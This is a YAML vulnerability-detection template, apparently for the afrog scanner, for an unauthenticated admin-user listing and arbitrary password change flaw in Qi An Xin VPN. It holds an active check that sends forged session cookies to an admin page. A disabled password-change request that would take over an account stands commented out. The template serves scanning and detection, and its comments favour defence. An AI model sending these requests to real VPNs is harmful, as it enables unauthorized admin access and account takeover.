漏洞描述
奇安信VPN未授权管理用户遍历及任意账号密码修改
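# Detection template for an authentication bypass on the VPN's web
# management interface: the admin group page is requested with a fixed,
# never-issued session cookie, and a rendered admin page counts as a hit.
# The nesting below is restored from a listing that had lost its
# indentation; the id/info/set/rules/expression layout looks like an
# afrog-style PoC -- confirm against the scanner actually in use.
#
# NOTE: "motify" in the id is kept as published, since the id is an
# identifier that other tooling or result stores may already reference.
id: qianxin-userlist-motify-user-password

info:
  name: 奇安信 VPN 未授权管理用户遍历及任意账号密码修改
  author: Zhiliao
  severity: critical
  verified: true
  description: |
    奇安信VPN未授权管理用户遍历及任意账号密码修改
  reference:
    - https://cn-sec.com/archives/1785824.html
  created: 2023/06/07

# baseurl is referenced only by the disabled r1 step further down.
set:
  baseurl: request.url

rules:
  # r0 is a read-only check: one GET with static cookie values and no
  # prior login. A match means the server rendered the admin group page
  # without validating the session ticket.
  # Defender note: the same request is visible in access logs as a hit on
  # /admin/group/x_group.php carrying the literal cookie value
  # "gw_admin_ticket=1", which is worth alerting on.
  r0:
    request:
      method: GET
      path: /admin/group/x_group.php?id=1
      headers:
        Cookie: admin_id=1; gw_admin_ticket=1;
    # Matching is by status code plus two body substrings only, so any
    # 200 response containing both strings matches; confirm a hit
    # manually before reporting it.
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'group_action.php') &&
      response.body.bcontains(b'anonymous')
  # r1 is intentionally left disabled. It is a state-changing request (it
  # submits a password change), so running it would modify the target.
  # The top-level expression evaluates r0 only; keep it that way for
  # scanning and leave r1 commented out.
  # r1:
  #   request:
  #     method: POST
  #     path: /changepass.php?type=2
  #     headers:
  #       Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={"this_name":"anonymous","subAuthId":"1"}
  #       Origin: "{{baseurl}}"
  #       Referer: "{{baseurl}}/welcome.php"
  #     body: old_pass=&password=a123456&repassword=a123456

# Final verdict: the target is reported only when r0 matches.
expression: r0()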